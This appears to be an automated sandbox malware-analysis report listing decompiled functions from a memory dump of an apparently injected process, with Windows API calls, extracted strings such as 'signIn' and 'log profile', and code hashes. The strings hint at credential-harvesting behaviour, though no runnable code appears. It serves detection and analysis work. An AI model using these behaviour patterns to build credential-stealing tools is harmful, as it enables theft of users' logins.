                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                    • String ID: 3A
                    • API String ID: 3300951397-293699754
                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                    • wcslen.MSVCRT ref: 0040D1D3
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                    • String ID: strings
                    • API String ID: 3166385802-3030018805
                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                    Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00411AF6
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 00411B14
                    • wcscat.MSVCRT ref: 00411B2E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamememsetwcscatwcsrchr
                    • String ID: AE$.cfg$General$EA
                    • API String ID: 776488737-1622828088
                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                    Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040D8BD
                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                    • memset.MSVCRT ref: 0040D906
                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                    • _wcsicmp.MSVCRT ref: 0040D92F
                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                    • String ID: sysdatetimepick32
                    • API String ID: 1028950076-4169760276
                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: -journal$-wal
                    • API String ID: 438689982-2894717839
                    • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                    • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                    • EndDialog.USER32(?,00000002), ref: 00405C83
                    • EndDialog.USER32(?,00000001), ref: 00405C98
                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Item$Dialog$MessageSend
                    • String ID:
                    • API String ID: 3975816621-0
                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                    • _wcsicmp.MSVCRT ref: 00444D09
                    • _wcsicmp.MSVCRT ref: 00444D1E
                    • _wcsicmp.MSVCRT ref: 00444D33
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$wcslen$_memicmp
                    • String ID: .save$http://$https://$log profile$signIn
                    • API String ID: 1214746602-2708368587
                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                    • String ID:
                    • API String ID: 2313361498-0
                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 00405F65
                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                    • GetWindow.USER32(00000000), ref: 00405F80
                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$ItemMessageRectSend$Client
                    • String ID:
                    • API String ID: 2047574939-0
                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                    • String ID:
                    • API String ID: 4218492932-0
                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                    • memcpy.MSVCRT ref: 0044A8BF
                    • memcpy.MSVCRT ref: 0044A90C
                    • memcpy.MSVCRT ref: 0044A988
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                    • memcpy.MSVCRT ref: 0044A9D8
                    • memcpy.MSVCRT ref: 0044AA19
                    • memcpy.MSVCRT ref: 0044AA4A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                    • API String ID: 3510742995-2446657581
                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                    • memset.MSVCRT ref: 00405ABB
                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                    • SetFocus.USER32(?), ref: 00405B76
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscat
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 384018552-4153097237
                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetwcschr
                    • String ID: 0$6
                    • API String ID: 2029023288-3849865405
                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                    • memset.MSVCRT ref: 00405455
                    • memset.MSVCRT ref: 0040546C
                    • memset.MSVCRT ref: 00405483
                    • memcpy.MSVCRT ref: 00405498
                    • memcpy.MSVCRT ref: 004054AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy$ErrorLast
                    • String ID: 6$\
                    • API String ID: 404372293-1284684873
                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                    Download Yara Rule
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                    • wcscpy.MSVCRT ref: 0040A0D9
                    • wcscat.MSVCRT ref: 0040A0E6
                    • wcscat.MSVCRT ref: 0040A0F5
                    • wcscpy.MSVCRT ref: 0040A107
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                    • String ID:
                    • API String ID: 1331804452-0
                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: advapi32.dll
                    • API String ID: 2012295524-4050573280
                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • <?xml version="1.0" ?>, xrefs: 0041007C
                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                    • <%s>, xrefs: 004100A6
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                    • API String ID: 3473751417-2880344631
                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset
                    • String ID: %2.2X
                    • API String ID: 2521778956-791839006
                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscpy
                    • String ID: dialog_%d$general$menu_%d$strings
                    • API String ID: 999028693-502967061
                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memsetstrlen
                    • String ID:
                    • API String ID: 2350177629-0
                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                    • API String ID: 2221118986-1606337402
                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                    • String ID:
                    • API String ID: 265355444-0
                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                    Download Yara Rule
                    APIs
